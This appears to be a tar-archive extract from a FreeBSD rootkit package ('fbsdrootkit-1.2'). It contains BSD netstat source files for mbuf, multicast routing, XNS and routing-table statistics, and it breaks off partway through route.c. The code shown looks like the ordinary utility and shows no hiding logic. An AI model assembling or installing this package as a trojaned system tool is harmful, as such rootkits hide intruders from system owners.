(domain[0]) { while ((cp = strchr(cp, '.'))) { if (!strcasecmp(cp + 1, domain)) { *cp = 0; /* hit it */ break; } else { cp++; } } } } fbsdrootkit-1.2/netstat/mbuf.c100600 764 0 10345 5723156433 14256 0ustar dfroot/* * Copyright (c) 1983, 1988, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char sccsid[] = "@(#)mbuf.c 8.1 (Berkeley) 6/6/93"; #endif /* not lint */ #include #include #include #include #include #include "netstat.h" #define YES 1 typedef int bool; struct mbstat mbstat; static struct mbtypes { int mt_type; char *mt_name; } mbtypes[] = { { MT_DATA, "data" }, { MT_OOBDATA, "oob data" }, { MT_CONTROL, "ancillary data" }, { MT_HEADER, "packet headers" }, { MT_SOCKET, "socket structures" }, /* XXX */ { MT_PCB, "protocol control blocks" }, /* XXX */ { MT_RTABLE, "routing table entries" }, /* XXX */ { MT_HTABLE, "IMP host table entries" }, /* XXX */ { MT_ATABLE, "address resolution tables" }, { MT_FTABLE, "fragment reassembly queue headers" }, /* XXX */ { MT_SONAME, "socket names and addresses" }, { MT_SOOPTS, "socket options" }, { MT_RIGHTS, "access rights" }, { MT_IFADDR, "interface addresses" }, /* XXX */ { 0, 0 } }; int nmbtypes = sizeof(mbstat.m_mtypes) / sizeof(short); bool seen[256]; /* "have we seen this type yet?" */ /* * Print mbuf statistics. */ void mbpr(mbaddr) u_long mbaddr; { register int totmem, totfree, totmbufs; register int i; register struct mbtypes *mp; if (nmbtypes != 256) { warnx("unexpected change to mbstat; check source"); return; } if (mbaddr == 0) { warnx("mbstat: symbol not in namelist"); return; } if (kread(mbaddr, (char *)&mbstat, sizeof (mbstat))) return; totmbufs = 0; for (mp = mbtypes; mp->mt_name; mp++) totmbufs += mbstat.m_mtypes[mp->mt_type]; printf("%u mbufs in use:\n", totmbufs); for (mp = mbtypes; mp->mt_name; mp++) if (mbstat.m_mtypes[mp->mt_type]) { seen[mp->mt_type] = YES; printf("\t%u mbufs allocated to %s\n", mbstat.m_mtypes[mp->mt_type], mp->mt_name); } seen[MT_FREE] = YES; for (i = 0; i < nmbtypes; i++) if (!seen[i] && mbstat.m_mtypes[i]) { printf("\t%u mbufs allocated to \n", mbstat.m_mtypes[i], i); } printf("%u/%u mbuf clusters in use\n", mbstat.m_clusters - mbstat.m_clfree, mbstat.m_clusters); totmem = totmbufs * MSIZE + mbstat.m_clusters * MCLBYTES; totfree = mbstat.m_clfree * MCLBYTES; printf("%u Kbytes allocated to network (%d%% in use)\n", totmem / 1024, (totmem - totfree) * 100 / totmem); printf("%u requests for memory denied\n", mbstat.m_drops); printf("%u requests for memory delayed\n", mbstat.m_wait); printf("%u calls to protocol drain routines\n", mbstat.m_drain); } fbsdrootkit-1.2/netstat/mroute.c100600 764 0 16112 6023335677 14641 0ustar dfroot/* * Copyright (c) 1989 Stephen Deering * Copyright (c) 1992, 1993 * The Regents of the University of California. All rights reserved. * * This code is derived from software contributed to Berkeley by * Stephen Deering of Stanford University. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)mroute.c 8.1 (Berkeley) 6/6/93 */ /* * Print DVMRP multicast routing structures and statistics. * * MROUTING 1.0 */ #include #include #include #include #include #include #include #include #include #define KERNEL 1 /* XXX bogus! */ #include #undef KERNEL #include #include #include "netstat.h" void mroutepr(mrpaddr, mfcaddr, vifaddr) u_long mrpaddr, mfcaddr, vifaddr; { u_int mrtproto; struct mbuf *mfctable[MFCTBLSIZ]; struct vif viftable[MAXVIFS]; struct mbuf mb, *m; struct mfc smfc; register struct vif *v; register vifi_t vifi; register struct in_addr *grp; register int i, n; register int banner_printed; register int saved_nflag; vifi_t maxvif; if (mrpaddr == 0) { printf("ip_mrtproto: symbol not in namelist\n"); return; } kread(mrpaddr, (char *)&mrtproto, sizeof(mrtproto)); switch (mrtproto) { case 0: printf("no multicast routing compiled into this system\n"); return; case IGMP_DVMRP: break; default: printf("multicast routing protocol %u, unknown\n", mrtproto); return; } if (mfcaddr == 0) { printf("mfctable: symbol not in namelist\n"); return; } if (vifaddr == 0) { printf("viftable: symbol not in namelist\n"); return; } saved_nflag = nflag; nflag = 1; kread(vifaddr, (char *)&viftable, sizeof(viftable)); banner_printed = 0; for (vifi = 0, v = viftable; vifi < MAXVIFS; ++vifi, ++v) { if (v->v_lcl_addr.s_addr == 0) continue; maxvif = vifi; if (!banner_printed) { printf("\nVirtual Interface Table\n" " Vif Thresh Rate Local-Address " "Remote-Address Pkts-In Pkts-Out\n"); banner_printed = 1; } printf(" %2u %6u %4d %-15.15s", vifi, v->v_threshold, v->v_rate_limit, routename(v->v_lcl_addr.s_addr)); printf(" %-15.15s", (v->v_flags & VIFF_TUNNEL) ? routename(v->v_rmt_addr.s_addr) : ""); printf(" %9lu %9lu\n", v->v_pkt_in, v->v_pkt_out); } if (!banner_printed) printf("\nVirtual Interface Table is empty\n"); kread(mfcaddr, (char *)&mfctable, sizeof(mfctable)); banner_printed = 0; for (i = 0; i < MFCTBLSIZ; ++i) { m = mfctable[i]; while(m) { kread((u_long)m, (char *)&mb, sizeof mb); m = &mb; if (!banner_printed) { printf("\nMulticast Forwarding Cache\n" " Origin Group " " Packets In-Vif Out-Vifs:Ttls\n"); banner_printed = 1; } kread((u_long)mtod(m, char *), (char *)&smfc, sizeof smfc); printf(" %-15.15s", routename(smfc.mfc_origin.s_addr)); printf(" %-15.15s", routename(smfc.mfc_mcastgrp.s_addr)); printf(" %9lu", smfc.mfc_pkt_cnt); printf(" %3d ", smfc.mfc_parent); for (vifi = 0; vifi <= maxvif; vifi++) { if (smfc.mfc_ttls[vifi] > 0) printf(" %u:%u", vifi, smfc.mfc_ttls[vifi]); } printf("\n"); m = m->m_act; } } if (!banner_printed) printf("\nMulticast Routing Table is empty\n"); printf("\n"); nflag = saved_nflag; } void mrt_stats(mrpaddr, mstaddr) u_long mrpaddr, mstaddr; { u_int mrtproto; struct mrtstat mrtstat; if(mrpaddr == 0) { printf("ip_mrtproto: symbol not in namelist\n"); return; } kread(mrpaddr, (char *)&mrtproto, sizeof(mrtproto)); switch (mrtproto) { case 0: printf("no multicast routing compiled into this system\n"); return; case IGMP_DVMRP: break; default: printf("multicast routing protocol %u, unknown\n", mrtproto); return; } if (mstaddr == 0) { printf("mrtstat: symbol not in namelist\n"); return; } kread(mstaddr, (char *)&mrtstat, sizeof(mrtstat)); printf("multicast forwarding:\n"); printf(" %10u multicast forwarding cache lookup%s\n", mrtstat.mrts_mfc_lookups, plural(mrtstat.mrts_mfc_lookups)); printf(" %10u multicast forwarding cache miss%s\n", mrtstat.mrts_mfc_misses, plurales(mrtstat.mrts_mfc_misses)); printf(" %10u upcall%s to mrouted\n", mrtstat.mrts_upcalls, plural(mrtstat.mrts_upcalls)); printf(" %10u upcall queue overflow%s\n", mrtstat.mrts_upq_ovflw, plural(mrtstat.mrts_upq_ovflw)); printf(" %10u upcall%s dropped due to full socket buffer\n", mrtstat.mrts_upq_sockfull, plural(mrtstat.mrts_upq_sockfull)); printf(" %10u cache cleanup%s\n", mrtstat.mrts_cache_cleanups, plural(mrtstat.mrts_cache_cleanups)); printf(" %10u datagram%s with no route for origin\n", mrtstat.mrts_no_route, plural(mrtstat.mrts_no_route)); printf(" %10u datagram%s arrived with bad tunneling\n", mrtstat.mrts_bad_tunnel, plural(mrtstat.mrts_bad_tunnel)); printf(" %10u datagram%s could not be tunneled\n", mrtstat.mrts_cant_tunnel, plural(mrtstat.mrts_cant_tunnel)); printf(" %10u datagram%s arrived on wrong interface\n", mrtstat.mrts_wrong_if, plural(mrtstat.mrts_wrong_if)); printf(" %10u datagram%s selectively dropped\n", mrtstat.mrts_drop_sel, plural(mrtstat.mrts_drop_sel)); printf(" %10u datagram%s dropped due to queue overflow\n", mrtstat.mrts_q_overflow, plural(mrtstat.mrts_q_overflow)); printf(" %10u datagram%s dropped for being too large\n", mrtstat.mrts_pkt2large, plural(mrtstat.mrts_pkt2large)); } fbsdrootkit-1.2/netstat/netstat.h100600 764 0 7730 5646654777 15022 0ustar dfroot/* * Copyright (c) 1992, 1993 * Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)netstat.h 8.2 (Berkeley) 1/4/94 */ #include int Aflag; /* show addresses of protocol control block */ int aflag; /* show all sockets (including servers) */ int bflag; /* show i/f total bytes in/out */ int dflag; /* show i/f dropped packets */ int gflag; /* show group (multicast) routing or stats */ int iflag; /* show interfaces */ int mflag; /* show memory stats */ int nflag; /* show addresses numerically */ int pflag; /* show given protocol */ int rflag; /* show routing tables (or routing stats) */ int sflag; /* show protocol statistics */ int tflag; /* show i/f watchdog timers */ int interval; /* repeat interval for i/f stats */ char *interface; /* desired i/f for stats, or NULL for all i/fs */ int unit; /* unit number for above */ int af; /* address family */ char *prog; /* program name */ int kread __P((u_long addr, char *buf, int size)); char *plural __P((int)); char *plurales __P((int)); void protopr __P((u_long, char *)); void tcp_stats __P((u_long, char *)); void udp_stats __P((u_long, char *)); void ip_stats __P((u_long, char *)); void icmp_stats __P((u_long, char *)); void igmp_stats __P((u_long, char *)); void protopr __P((u_long, char *)); void mbpr(u_long); void hostpr __P((u_long, u_long)); void impstats __P((u_long, u_long)); void intpr __P((int, u_long)); void pr_rthdr __P(()); void pr_family __P((int)); void rt_stats __P((u_long)); char *ns_phost __P((struct sockaddr *)); void upHex __P((char *)); char *routename __P((u_long)); char *netname __P((u_long, u_long)); char *ns_print __P((struct sockaddr *)); void routepr __P((u_long)); void nsprotopr __P((u_long, char *)); void spp_stats __P((u_long, char *)); void idp_stats __P((u_long, char *)); void nserr_stats __P((u_long, char *)); void intpr __P((int, u_long)); void unixpr __P((u_long)); void esis_stats __P((u_long, char *)); void clnp_stats __P((u_long, char *)); void cltp_stats __P((u_long, char *)); void iso_protopr __P((u_long, char *)); void iso_protopr1 __P((u_long, int)); void tp_protopr __P((u_long, char *)); void tp_inproto __P((u_long)); void tp_stats __P((caddr_t, caddr_t)); void mroutepr __P((u_long, u_long, u_long)); void mrt_stats __P((u_long, u_long)); fbsdrootkit-1.2/netstat/ns.c100600 764 0 25754 5571373150 13755 0ustar dfroot/* * Copyright (c) 1983, 1988, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char sccsid[] = "@(#)ns.c 8.1 (Berkeley) 6/6/93"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define SANAMES #include #include #include #include #include #include "netstat.h" struct nspcb nspcb; struct sppcb sppcb; struct socket sockb; static char *ns_prpr __P((struct ns_addr *)); static void ns_erputil __P((int, int)); static int first = 1; /* * Print a summary of connections related to a Network Systems * protocol. For SPP, also give state of connection. * Listening processes (aflag) are suppressed unless the * -a (all) flag is specified. */ void nsprotopr(off, name) u_long off; char *name; { struct nspcb cb; register struct nspcb *prev, *next; int isspp; if (off == 0) return; isspp = strcmp(name, "spp") == 0; kread(off, (char *)&cb, sizeof (struct nspcb)); nspcb = cb; prev = (struct nspcb *)off; if (nspcb.nsp_next == (struct nspcb *)off) return; for (;nspcb.nsp_next != (struct nspcb *)off; prev = next) { u_long ppcb; next = nspcb.nsp_next; kread((u_long)next, (char *)&nspcb, sizeof (nspcb)); if (nspcb.nsp_prev != prev) { printf("???\n"); break; } if (!aflag && ns_nullhost(nspcb.nsp_faddr) ) { continue; } kread((u_long)nspcb.nsp_socket, (char *)&sockb, sizeof (sockb)); ppcb = (u_long) nspcb.nsp_pcb; if (ppcb) { if (isspp) { kread(ppcb, (char *)&sppcb, sizeof (sppcb)); } else continue; } else if (isspp) continue; if (first) { printf("Active NS connections"); if (aflag) printf(" (including servers)"); putchar('\n'); if (Aflag) printf("%-8.8s ", "PCB"); printf(Aflag ? "%-5.5s %-6.6s %-6.6s %-18.18s %-18.18s %s\n" : "%-5.5s %-6.6s %-6.6s %-22.22s %-22.22s %s\n", "Proto", "Recv-Q", "Send-Q", "Local Address", "Foreign Address", "(state)"); first = 0; } if (Aflag) printf("%8x ", ppcb); printf("%-5.5s %6d %6d ", name, sockb.so_rcv.sb_cc, sockb.so_snd.sb_cc); printf(" %-22.22s", ns_prpr(&nspcb.nsp_laddr)); printf(" %-22.22s", ns_prpr(&nspcb.nsp_faddr)); if (isspp) { extern char *tcpstates[]; if (sppcb.s_state >= TCP_NSTATES) printf(" %d", sppcb.s_state); else printf(" %s", tcpstates[sppcb.s_state]); } putchar('\n'); prev = next; } } #define ANY(x,y,z) \ ((x) ? printf("\t%d %s%s%s -- %s\n",x,y,plural(x),z,"x") : 0) /* * Dump SPP statistics structure. */ void spp_stats(off, name) u_long off; char *name; { struct spp_istat spp_istat; #define sppstat spp_istat.newstats if (off == 0) return; kread(off, (char *)&spp_istat, sizeof (spp_istat)); printf("%s:\n", name); ANY(spp_istat.nonucn, "connection", " dropped due to no new sockets "); ANY(spp_istat.gonawy, "connection", " terminated due to our end dying"); ANY(spp_istat.nonucn, "connection", " dropped due to inability to connect"); ANY(spp_istat.noconn, "connection", " dropped due to inability to connect"); ANY(spp_istat.notme, "connection", " incompleted due to mismatched id's"); ANY(spp_istat.wrncon, "connection", " dropped due to mismatched id's"); ANY(spp_istat.bdreas, "packet", " dropped out of sequence"); ANY(spp_istat.lstdup, "packet", " duplicating the highest packet"); ANY(spp_istat.notyet, "packet", " refused as exceeding allocation"); ANY(sppstat.spps_connattempt, "connection", " initiated"); ANY(sppstat.spps_accepts, "connection", " accepted"); ANY(sppstat.spps_connects, "connection", " established"); ANY(sppstat.spps_drops, "connection", " dropped"); ANY(sppstat.spps_conndrops, "embryonic connection", " dropped"); ANY(sppstat.spps_closed, "connection", " closed (includes drops)"); ANY(sppstat.spps_segstimed, "packet", " where we tried to get rtt"); ANY(sppstat.spps_rttupdated, "time", " we got rtt"); ANY(sppstat.spps_delack, "delayed ack", " sent"); ANY(sppstat.spps_timeoutdrop, "connection", " dropped in rxmt timeout"); ANY(sppstat.spps_rexmttimeo, "retransmit timeout", ""); ANY(sppstat.spps_persisttimeo, "persist timeout", ""); ANY(sppstat.spps_keeptimeo, "keepalive timeout", ""); ANY(sppstat.spps_keepprobe, "keepalive probe", " sent"); ANY(sppstat.spps_keepdrops, "connection", " dropped in keepalive"); ANY(sppstat.spps_sndtotal, "total packet", " sent"); ANY(sppstat.spps_sndpack, "data packet", " sent"); ANY(sppstat.spps_sndbyte, "data byte", " sent"); ANY(sppstat.spps_sndrexmitpack, "data packet", " retransmitted"); ANY(sppstat.spps_sndrexmitbyte, "data byte", " retransmitted"); ANY(sppstat.spps_sndacks, "ack-only packet", " sent"); ANY(sppstat.spps_sndprobe, "window probe", " sent"); ANY(sppstat.spps_sndurg, "packet", " sent with URG only"); ANY(sppstat.spps_sndwinup, "window update-only packet", " sent"); ANY(sppstat.spps_sndctrl, "control (SYN|FIN|RST) packet", " sent"); ANY(sppstat.spps_sndvoid, "request", " to send a non-existant packet"); ANY(sppstat.spps_rcvtotal, "total packet", " received"); ANY(sppstat.spps_rcvpack, "packet", " received in sequence"); ANY(sppstat.spps_rcvbyte, "byte", " received in sequence"); ANY(sppstat.spps_rcvbadsum, "packet", " received with ccksum errs"); ANY(sppstat.spps_rcvbadoff, "packet", " received with bad offset"); ANY(sppstat.spps_rcvshort, "packet", " received too short"); ANY(sppstat.spps_rcvduppack, "duplicate-only packet", " received"); ANY(sppstat.spps_rcvdupbyte, "duplicate-only byte", " received"); ANY(sppstat.spps_rcvpartduppack, "packet", " with some duplicate data"); ANY(sppstat.spps_rcvpartdupbyte, "dup. byte", " in part-dup. packet"); ANY(sppstat.spps_rcvoopack, "out-of-order packet", " received"); ANY(sppstat.spps_rcvoobyte, "out-of-order byte", " received"); ANY(sppstat.spps_rcvpackafterwin, "packet", " with data after window"); ANY(sppstat.spps_rcvbyteafterwin, "byte", " rcvd after window"); ANY(sppstat.spps_rcvafterclose, "packet", " rcvd after 'close'"); ANY(sppstat.spps_rcvwinprobe, "rcvd window probe packet", ""); ANY(sppstat.spps_rcvdupack, "rcvd duplicate ack", ""); ANY(sppstat.spps_rcvacktoomuch, "rcvd ack", " for unsent data"); ANY(sppstat.spps_rcvackpack, "rcvd ack packet", ""); ANY(sppstat.spps_rcvackbyte, "byte", " acked by rcvd acks"); ANY(sppstat.spps_rcvwinupd, "rcvd window update packet", ""); } #undef ANY #define ANY(x,y,z) ((x) ? printf("\t%d %s%s%s\n",x,y,plural(x),z) : 0) /* * Dump IDP statistics structure. */ void idp_stats(off, name) u_long off; char *name; { struct idpstat idpstat; if (off == 0) return; kread(off, (char *)&idpstat, sizeof (idpstat)); printf("%s:\n", name); ANY(idpstat.idps_toosmall, "packet", " smaller than a header"); ANY(idpstat.idps_tooshort, "packet", " smaller than advertised"); ANY(idpstat.idps_badsum, "packet", " with bad checksums"); } static struct { u_short code; char *name; char *where; } ns_errnames[] = { {0, "Unspecified Error", " at Destination"}, {1, "Bad Checksum", " at Destination"}, {2, "No Listener", " at Socket"}, {3, "Packet", " Refused due to lack of space at Destination"}, {01000, "Unspecified Error", " while gatewayed"}, {01001, "Bad Checksum", " while gatewayed"}, {01002, "Packet", " forwarded too many times"}, {01003, "Packet", " too large to be forwarded"}, {-1, 0, 0}, }; /* * Dump NS Error statistics structure. */ /*ARGSUSED*/ void nserr_stats(off, name) u_long off; char *name; { struct ns_errstat ns_errstat; register int j; register int histoprint = 1; int z; if (off == 0) return; kread(off, (char *)&ns_errstat, sizeof (ns_errstat)); printf("NS error statistics:\n"); ANY(ns_errstat.ns_es_error, "call", " to ns_error"); ANY(ns_errstat.ns_es_oldshort, "error", " ignored due to insufficient addressing"); ANY(ns_errstat.ns_es_oldns_err, "error request", " in response to error packets"); ANY(ns_errstat.ns_es_tooshort, "error packet", " received incomplete"); ANY(ns_errstat.ns_es_badcode, "error packet", " received of unknown type"); for(j = 0; j < NS_ERR_MAX; j ++) { z = ns_errstat.ns_es_outhist[j]; if (z && histoprint) { printf("Output Error Histogram:\n"); histoprint = 0; } ns_erputil(z, ns_errstat.ns_es_codes[j]); } histoprint = 1; for(j = 0; j < NS_ERR_MAX; j ++) { z = ns_errstat.ns_es_inhist[j]; if (z && histoprint) { printf("Input Error Histogram:\n"); histoprint = 0; } ns_erputil(z, ns_errstat.ns_es_codes[j]); } } static void ns_erputil(z, c) int z, c; { int j; char codebuf[30]; char *name, *where; for(j = 0;; j ++) { if ((name = ns_errnames[j].name) == 0) break; if (ns_errnames[j].code == c) break; } if (name == 0) { if (c > 01000) where = "in transit"; else where = "at destination"; sprintf(codebuf, "Unknown XNS error code 0%o", c); name = codebuf; } else where = ns_errnames[j].where; ANY(z, name, where); } static struct sockaddr_ns ssns = {AF_NS}; static char *ns_prpr(x) struct ns_addr *x; { struct sockaddr_ns *sns = &ssns; sns->sns_addr = *x; return(ns_print((struct sockaddr *)sns)); } fbsdrootkit-1.2/netstat/route.c100600 764 0 41140 6163407273 14460 0ustar dfroot/* * Copyright (c) 1983, 1988, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint #if 0 static char sccsid[] = "From: @(#)route.c 8.6 (Berkeley) 4/28/95"; #endif static const char rcsid[] = "$Id: route.c,v 1.5.4.1 1996/06/24 00:13:50 peter Exp $"; #endif /* not lint */ #include #include #include #include #include #include #include #define KERNEL #include #undef KERNEL #include #include #include #include #include #include #include #include #include #include #include "netstat.h" #define kget(p, d) (kread((u_long)(p), (char *)&(d), sizeof (d))) /* * Definitions for showing gateway flags. */ struct bits { u_long b_mask; char b_val; } bits[] = { { RTF_UP, 'U' }, { RTF_GATEWAY, 'G' }, { RTF_HOST, 'H' }, { RTF_REJECT, 'R' }, { RTF_DYNAMIC, 'D' }, { RTF_MODIFIED, 'M' }, { RTF_DONE, 'd' }, /* Completed -- for routing messages only */ { RTF_MASK, 'm' }, /* Mask Present -- for routing messages only */ { RTF_CLONING, 'C' }, { RTF_XRESOLVE, 'X' }, { RTF_LLINFO, 'L' }, { RTF_STATIC, 'S' }, { RTF_PROTO1, '1' }, { RTF_PROTO2, '2' }, { RTF_WASCLONED,'W' }, { RTF_PRCLONING,'c' }, { RTF_PROTO3, '3' }, { RTF_BLACKHOLE,'B' }, { 0 } }; static union { struct sockaddr u_sa; u_short u_data[128]; } pt_u; int do_rtent = 0; struct rtentry rtentry; struct radix_node rnode; struct radix_mask rmask; struct radix_node_head *rt_tables[AF_MAX+1]; int NewTree = 0; static struct sockaddr *kgetsa __P((struct sockaddr *)); static void p_tree __P((struct radix_node *)); static void p_rtnode __P(()); static void ntreestuff __P(()); static void np_rtentry __P((struct rt_msghdr *)); static void p_sockaddr __P((struct sockaddr *, struct sockaddr *, int, int)); static void p_flags __P((int, char *)); static void p_rtentry __P((struct rtentry *)); /* * Print routing tables. */ void routepr(rtree) u_long rtree; { struct radix_node_head *rnh, head; int i; printf("Routing tables\n"); if (Aflag == 0 && NewTree) ntreestuff(); else { if (rtree == 0) { printf("rt_tables: symbol not in namelist\n"); return; } kget(rtree, rt_tables); for (i = 0; i <= AF_MAX; i++) { if ((rnh = rt_tables[i]) == 0) continue; kget(rnh, head); if (i == AF_UNSPEC) { if (Aflag && af == 0) { printf("Netmasks:\n"); p_tree(head.rnh_treetop); } } else if (af == AF_UNSPEC || af == i) { pr_family(i); do_rtent = 1; pr_rthdr(); p_tree(head.rnh_treetop); } } } } /* * Print address family header before a section of the routing table. */ void pr_family(af) int af; { char *afname; switch (af) { case AF_INET: afname = "Internet"; break; case AF_NS: afname = "XNS"; break; case AF_ISO: afname = "ISO"; break; case AF_CCITT: afname = "X.25"; break; default: afname = NULL; break; } if (afname) printf("\n%s:\n", afname); else printf("\nProtocol Family %d:\n", af); } /* column widths; each followed by one space */ #define WID_DST 18 /* width of destination column */ #define WID_GW 18 /* width of gateway column */ /* * Print header for routing table columns. */ void pr_rthdr() { if (Aflag) printf("%-8.8s ","Address"); printf("%-*.*s %-*.*s %-6.6s %6.6s%8.8s %8.8s %6s\n", WID_DST, WID_DST, "Destination", WID_GW, WID_GW, "Gateway", "Flags", "Refs", "Use", "Netif", "Expire"); } static struct sockaddr * kgetsa(dst) register struct sockaddr *dst; { kget(dst, pt_u.u_sa); if (pt_u.u_sa.sa_len > sizeof (pt_u.u_sa)) kread((u_long)dst, (char *)pt_u.u_data, 